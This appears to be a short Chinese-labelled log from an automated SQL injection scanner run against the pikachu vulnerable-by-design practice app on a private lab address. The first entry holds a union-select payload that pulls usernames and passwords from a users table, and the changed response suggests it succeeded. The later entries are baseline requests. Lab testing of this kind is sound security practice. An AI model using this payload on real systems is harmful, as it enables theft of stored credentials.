[测试]: GET name=1') union select username,password from users # 
[状态码]: 200
[响应变化]:
email is
username? your uid:admin your email
[网页关键信息]:
uid:670
email is: achu

--------------------------------------------------
[时间]: 13:40:24
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[方法]: GET
[参数]: {'name': '1', 'submit': '查询'}
--------------------------------------------------
[时间]: 13:40:24
[URL]: http://192.168.232.128/pikachu/vul/sqli/sqli_x.php
[测试]: GET name=1
[状态码]: 200
[响应变化]:
username不存在
[网页关键信息]:
username：不存在

